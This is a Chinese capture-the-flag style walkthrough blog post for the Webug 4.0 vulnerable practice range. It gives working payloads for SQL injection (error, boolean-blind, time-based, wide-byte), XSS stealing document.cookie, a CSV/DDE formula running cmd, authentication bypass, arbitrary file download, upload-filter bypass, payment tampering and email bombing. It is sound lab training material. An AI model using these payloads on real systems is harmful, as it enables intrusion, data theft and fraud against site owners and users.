Webug4.0靶场通关

这篇具有很好参考价值的文章主要介绍了Webug4.0靶场通关。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

14.Webug4.0靶场通关

显错注入

首先整体浏览网站

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

注入点:

control/sqlinject/manifest_error.php?id=1

判断注入类型

输入: and 1=1 正常, 再输入: and 1=2 还正常, 排除数字型

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

输入单引号: ’ 网页发生变化

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

输入’ – q注释掉单引号,页面回显正常 则为字符型

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

判断字段数

构造payload:

’ order by 3-- q

页面回显错误,而order by 2则回显正常,所以字段数为2

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

查找回显点

构造payload:

’ union select 1,2 – q

我们可以在2处得到我们想要的内容

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

查询数据库

’ union select 1,database() – q

为webug

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

查询所有数据库

’ union select 1,group_concat(schema_name) from information_schema.schemata – q

为information_schema,mysql,performance_schema,webug,webug_sys,webug_width_byte

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

查询数据库webug中的表

’ union select 1,group_concat(table_name) from information_schema.tables where table_schema=‘webug’ – q

为data_crud,env_list,env_path,flag,sqlinjection,user,user_test

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

查看flag表的所有字段

’ union select 1,group_concat(column_name) from information_schema.columns where table_schema=‘webug’ and table_name=‘flag’-- q

为id,flag

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

查看flag字段的内容

’ union select 1,group_concat(flag) from flag-- q

为dfafdasfafdsadfa

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

布尔注入

输入单引号: ’ 网页发生变化

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

输入’ – q注释掉单引号,页面回显正常 则为字符型

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

判断数据库长度为5

id=1’ and length(database())=5–+

爆破数据库名字为webug

id=1’ and ascii(substr(database(),1,1))=119 --+

判断当前数据库表数量为7

id=1’ and (select count(*) from information_schema.tables where table_schema=database())=7–+

判断第二张表,表名的长度为8

id=1’ and (select length(table_name) from information_schema.tables where table_schema=database() limit 1,1)=8–+

爆破第二张表表名 第一个字符的ascii码值:101

id=1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=101–+

爆破出8个ascii值为:101 110 118 95 108 105 115 116 解码为env_list

猜解env_list的字段数量为8

id=1’ and (select count(column_name) from information_schema.columns where table_name=‘env_list’)=8–+

猜解env_list第一个列名字符长度为2

id=1’ and (select length(column_name) from information_schema.columns where table_name=‘env_list’ limit 0,1)=2–+

猜解env_list第二个列名字符长度为7

id=1’ and (select length(column_name) from information_schema.columns where table_name=‘env_list’ limit 1,1)=7–+

猜解env_list第五个列名字符长度

id=1’ and (select length(column_name) from information_schema.columns where table_name=‘env_list’ limit 5,1)=7–+

爆破第五个列名,第一个字符的ascii为101

id=1’ and ascii(substr((select column_name from information_schema.columns where table_name=‘env_list’ limit 5,1),1,1))=101–+

爆破第五个列名,第二个字符的ascii

id=1’ and ascii(substr((select column_name from information_schema.columns where table_name=‘env_list’ limit 5,1),2,1))=110–+

爆破了7个字符,ascii码为101 110 118 70 108 97 103

解码后等于envFlag

猜解envFlag字段的记录为20

id=1’ and (select count(envFlag) from env_list)=20–+

猜解envFlag字段第一条字段的字符数为16

id=1’ and (select length(envFlag) from env_list limit 0,1)=16–+

猜解envFlag字段第二条字段有多少个字符

id=1’ and (select length(envFlag) from env_list limit 1,1)=9–+

猜解flag

id=1’ and ascii(substr((select envFlag from env_list limit 1,1),1,1))=102–+

id=1’ and ascii(substr((select envFlag from env_list limit 1,1),2,1))=100–+

最终爆破完flag的ascii值:

102 100 115 97 102 115 100 102 97

解码为:

fdsafsdfa

延时注入

延时注入语句和盲注的语句都类似,不过就是多了一个if语句去判断,如果正确或不正确都会返回相对应的响应时间。

可以看到我以下payload的规则:

1' and if(/*!上一关盲注语句*/,sleep(3),1)--+

出现延迟,说明存在注入

1’ and sleep(3)–+

判断数据库字符长度

1’ and if(length(database())=5,sleep(3),1)–+

爆破数据库名

1’ and if(ascii(substr(database(),1,1))=119,sleep(3),1)–+

1’ and if(ascii(substr(database(),2,1))=101,sleep(3),1)–+

判断当前数据库表数量

1’ and if((select count(*) from information_schema.tables where table_schema=database())=7,sleep(3),1)–+

判断第一张表,表名的长度

1’ and if((select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)=9,sleep(3),1)–+

判断第二张表,表名的长度

1’ and if((select length(table_name) from information_schema.tables where table_schema=database() limit 1,1)=8,sleep(3),1)–+

爆破第二张表表名

第一个字符的ascii码值

1’ and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=101,sleep(3),1)–+

第二个字符的ascii码值

1’ and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1))=110,sleep(3),1)–+

猜解表有多少个字段

1’ and if((select count(column_name) from information_schema.columns where table_name=‘env_list’)=8,sleep(3),1)–+

猜解表的第一个列名字符长度

1’ and if((select length(column_name) from information_schema.columns where table_name=‘env_list’ limit 0,1)=2,sleep(3),1)–+

爆破第五个列名,第一个字符的ascii

1’ and if(ascii(substr((select column_name from information_schema.columns where table_name=‘env_list’ limit 5,1),1,1))=101,sleep(3),1)–+

爆破第五个列名,第二个字符的ascii

猜解envFlag字段有多少条记录

1’ and if((select count(envFlag) from env_list)=20,sleep(3),1)–+

猜解envFlag字段第三条字段有多少个字符(flag在第三条记录)

1’ and if((select length(envFlag) from env_list limit 2,1)=9,sleep(3),1)–+

猜解flag

1’ and if(ascii(substr((select envFlag from env_list limit 2,1),1,1))=103,sleep(3),1)–+

1’ and if(ascii(substr((select envFlag from env_list limit 2,1),2,1))=102,sleep(3),1)–+

最后flag的ASCII码值为:

103 102 100 103 100 102 115 100 103

解码:

gfdgdfsdg

post注入

首先整体浏览网页

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

搜索框可能存在注入点,burp抓包,构造payload:

1’

出现报错

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

构造payload:

1’ or sleep(3)–+

页面出现延迟

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

剩下的操作和上一关一样 ,只需要将and改成or即可。

过滤注入

同上,并没有过滤。

宽字节注入

报错

id=1%df%27

如下

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

正常显示

id=1%df%27–+

如下

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

查看当前字段数,字段数为2

id=1%df%27 order by 2–+

如下

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

查看显示位

id=1%df%27 and 1=2 union select 1,2–+

我们可以在2处获得我们想要的内容

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

查看所有数据库

id=1%df%27%20and%201=2%20union%20select%201,concat(schema_name,0x7e)%20from%20information_schema.schemata–+

为information_schemamysqlperformance_schemawebugwebug_syswebug_width_byte

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

查看webug数据库下的所有表

id=1%df%27 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7765627567–+

为data_crud,env_list,env_path,flag,sqlinjection,user,user_test

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

查看env_list表下所有字段

id=1%df%27 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x656E765F6C697374–+

为id,envName,envDesc,envIntegration,delFlag,envFlag,level,type

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

查看flag

id=1%df%27 and 1=2 union select 1,envFlag from webug.env_list limit 5,1–+

为dfsadfsadfas

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

xxe注入

整体浏览网站

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

因为是xxe注入,所以直接输入xml格式数据传输过去

<?xml version="1.0"?>
<helo>
   <batch id="test">
      <title>xxe</title>
      <test>xxe test</test>
	</batch>
</helo>

可以看到我们输入的内容会被显示出来,那么就代表xml代码能够被网站解析执行。

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

csv注入

1、什么是csv注入?

CSV公式注入(CSV Injection)是一种会造成巨大影响的攻击向量。攻击包含向恶意的EXCEL公式中注入可以输出或以CSV文件读取的参数。当在Excel中打开CSV文件时,文件会从CSV描述转变为原始的Excel格式,包括Excel提供的所有动态功能。在这个过程中,CSV中的所有Excel公式都会执行。当该函数有合法意图时,很易被滥用并允许恶意代码执行。

2.cvs注入的原理时是什么?

当输入一个公式,会被Excel自动运算并执行。而当你输入一个别的Excel本身不存在的功能时,Excel就会被微软的另一种机制:DDE机制调用。

3.什么是DDE?

DDE是一种动态数据交换机制(Dynamic Data Exchange,DDE)。使用DDE通讯需要两个Windows应用程序,其中一个作为服务器处理信息,另外一个作为客户机从服务器获得信息。客户机应用程序向当前所激活的服务器应用程序发送一条消息请求信息,服务器应用程序根据该信息作出应答,从而实现两个程序之间的数据交换。

构造payload:

=cmd|’ /C calc’!A0

在单元格中输入

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

按下回车键,会出现恶意提示

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

点击是,会弹出计算器

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

反射型xss

整体浏览网页

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

可以看到1是我们可控制点

pyaload:

id=1<script>alert(document.cookie)</script>

成功弹窗

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

存储型xss

整体浏览网页,可以看到最后有一个留言框

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

构造payload:

<script>alert(document.cookie)</script>

成功弹窗

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

万能密码登陆

整体浏览网页

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

账号:admin

密码:’ or ‘1’='1

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

DOM型xss

打开靶场,可以看到输入框

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

构造payload:

"required=" "><script>alert(document.cookie)</script><name="

成功弹窗

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

过滤xss

过滤了script字符

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

换个标签:

<img src=1 onerror=alert(document.cookie)>

成功弹窗

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

链接注入

"链接注入"是修改站点内容的行为,其方式为将外部站点的 URL 嵌入其中,或将有易受攻击的站点中的脚本 的 URL 嵌入其中。将 URL 嵌入易受攻击的站点中,攻击者便能够以它为平台来启动对其他站点的攻击,以及攻击这个易受攻击的站点本身。

在这些可能的攻击中,有些需要用户在攻击期间登录站点。攻击者从这一易受攻击的站点本身启动这些攻击,成功的机会比较大,因为用户登录的可能性更大。

“链接注入”漏洞是用户输入清理不充分的结果,清理结果会在稍后的站点响应中返回给用户。攻击者能够将危险字符注入响应中,便能够嵌入 URL 及其他可能的内容修改。

整体浏览网页

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

构造payload:

id=<a href="http://baidu.com">baidu</a>

成功将百度嵌入到页面中

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

任意文件下载

打开网页,看到下载按钮

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

鼠标右键,点击复制链接地址

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

构造payload:

file=template/assets/img/1.txt

file=index.php

可以下载index.php,看到php源码

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

mysql配置文件下载

此题与上题原理相同,不过题目是需要我们下载mysql的配置文件

…/mysql/时,执行了下载命令,说明存在mysql目录

file=…/mysql/

直接下载my.ini

file=…/mysql/my.ini

成功下载

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

文件上传(前端拦截)

整体浏览网页,选择php类型的文件时会显示不允许上传

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

将phpinfo后缀名修改为png,burp抓包

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

将后缀名重新修改为php

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

点击上传,得到文件路径

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

成功访问

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

文件上传(畸形文件)

将文件命名为:

phpinfo.png

burp抓包后将文件名改成.pphphp

phpinfo.pphphp

即可绕过

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

访问路径

/template/upload/1616405351.php

上传成功

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

支付漏洞

进入靶场,点击立刻购买时,可以看到我们直接购买了商品

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

打开burp suite,点击立刻购买时,拦截数据包

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

可以看到金额为100,我们修改成0.01,然后发包,提示我们花了0.01购买了商品

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

邮箱轰炸

输入邮箱,点击注册,然后利用burp suite进行抓包

4p41ztex@linshiyouxiang.net

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

发送到intruder模块

设置payload:

选择Null payload

输入发送次数,20次

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

URL跳转

整体浏览网页

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

复制链接地址

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

构造payload:

url=https://www.baidu.com

url=https://www.bilibili.com

成功跳转

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

文件包含漏洞

整体浏览网站,本身就已经证明了是包含漏洞

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

构造payload:

filename=…/…/control/upload_file/upload_file_3.php

成功跳转到文件上传页面

webug通关,web安全,渗透测试,代码审计,漏洞复现,红队攻防

文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。

免责声明:由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失,均由使用者本人负责, 文章作者不为此承担任何责任。

转载声明:儒道易行 拥有对此文章的修改和解释权,如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章的内容,不得以任何方式将其用于商业目的。文章来源地址https://www.toymoban.com/news/detail-655331.html

博客:
https://rdyx0.github.io/

先知社区:
https://xz.aliyun.com/u/37846

SecIN:
https://www.sec-in.com/author/3097

CSDN:
https://blog.csdn.net/weixin_48899364?type=blog

公众号:
https://mp.weixin.qq.com/mp/appmsgalbum?__biz=Mzg5NTU2NjA1Mw==&action=getalbum&album_id=1696286248027357190&scene=173&from_msgid=2247485408&from_itemidx=1&count=3&nolastread=1#wechat_redirect

FreeBuf:
https://www.freebuf.com/author/%E5%9B%BD%E6%9C%8D%E6%9C%80%E5%BC%BA%E6%B8%97%E9%80%8F%E6%8E%8C%E6%8E%A7%E8%80%85

到了这里,关于Webug4.0靶场通关的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Web安全:WebGoat 靶场搭建(WEB漏洞测试和练习)

    WebGoat是OWASP组织研制出的用于进行web漏洞实验的应用平台,用来说明web应用中存在的安全漏洞。WebGoat运行在带有 java 虚拟机的平台之上,包括:跨站点脚本攻击(XSS)、访问控制、线程安全、操作隐藏字段、操纵参数、弱会话cookie、SQL盲注、数字型SQL注入、字符串型SQL注入、

    2024年02月12日
    浏览(44)
  • 【web安全】渗透测试实战思路

    1. 不建议太小的公司(可能都是请别人来开发的,用现成成熟的框架) 2. 不建议一线大厂:腾讯,字节,阿里等,你懂的 3. 不建议政府部门,安全设备多,每年有护网,报警你就死 建议:找上市公司与子公司,有开发人员,就有漏洞 重点:先在天眼查那些找域名 所有上市

    2024年02月19日
    浏览(56)
  • bugku-渗透测试1通关 wp

    题型取自bugku-渗透测试1 https://ctf.bugku.com/ctfplus/detail/id/1.html 内容包含:查看js源码、上传webshell、pwn、Nday利用、内网代理、端口转发、提权 查看js源码,搜索flag字符串,flag{ee34145ad2a5e1d2af2b4411959f019e} 根据场景1的提示找到后台管理页面 http://101.132.103.210/admin-login-index.html,adm

    2023年04月13日
    浏览(33)
  • Web安全-渗透测试-基础知识02

    无代理服务器 Request请求数据包 Reponse相应数据包 有代理服务器 Requeset请求数据包 Proxy代理服务器 Reponse相应数据包 代理的出现在接受数据包和发送数据包的时候提供了修改数据包的机会 总结: 建立连接——发送请求数据包——返回响应数据包——关闭连接 定义: HTTP协议是超

    2024年02月07日
    浏览(45)
  • Web安全-渗透测试-基础知识01

    定义: 域名(英语:Domain Name),又称网域,是由一串用点分隔的名字组成的互联网上某一台计算机或计算机组的名称,用于在数据传输时对计算机的定位标识. 因为ip地址不方便记忆.而且不能显示地址组织的名称和性质,所以用域名也可以定位到响应的up,可简单理解为是ip地址

    2024年02月07日
    浏览(61)
  • Web安全——渗透测试基础知识上

    1、Web安全——HTML基础 2、Web安全——DIV CSS基础 3、Web安全——JavaScript基础 4、Web安全——PHP基础 5、Web安全——JavaScript基础(加入案例) 6、靶场搭建——搭建pikachu靶场 7、Web安全——数据库mysql学习 黑客测试 行业术语扫盲(hack方面) 所谓“肉鸡”是一种很形象的比喻,比

    2024年02月13日
    浏览(51)
  • 《WEB安全渗透测试》(37) 内网渗透神器:fscan使用攻略

    Fscan是一款内网综合扫描工具,它非常的方便,一键启动,之后完全自动化、并且全方位漏洞扫描。它支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。 这

    2024年02月13日
    浏览(40)
  • B-4:Web 安全之综合渗透测试

    1. 使用渗透机场景 Kali2.0 中的工具扫描服务器,通过扫描服务器得到 web 端口,登陆网站(网站路径为 IP/up),找到网站首页中的 Flag 并提交;  F12发现./css/flag.txt是flag Flag{sacasceafvdbtsd} webshell  即为本题的进入方式 观看本题给出的信息了解到需要我们上传1.php 上传1.php发现不被

    2024年02月12日
    浏览(37)
  • [渗透测试]—4.2 Web应用安全漏洞

    在本节中,我们将学习OWASP(开放网络应用安全项目)发布的十大Web应用安全漏洞。OWASP十大安全漏洞是对Web应用安全风险进行评估的标准,帮助开发者和安全工程师了解并防范常见的安全威胁。 概念 :注入漏洞发生在应用程序将不可信的数据作为命令或查询的一部分执行时

    2024年02月13日
    浏览(51)
  • 《WEB安全渗透测试》(35) 使用Burp Clickbandit测试点击劫持

    点击劫持指的是,通过覆盖不可见的框架误导受害者点击,虽然受害者点击的是他所看到的网页,但其实他所点击的是被黑客精心构建的另一个置于原网页上面的透明页面。 Burp Clickbandit 是用于生成点击劫持攻击的工具,当发现可能容易受到点击劫持的网页时,可以使用 Bu

    2024年02月04日
    浏览(45)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包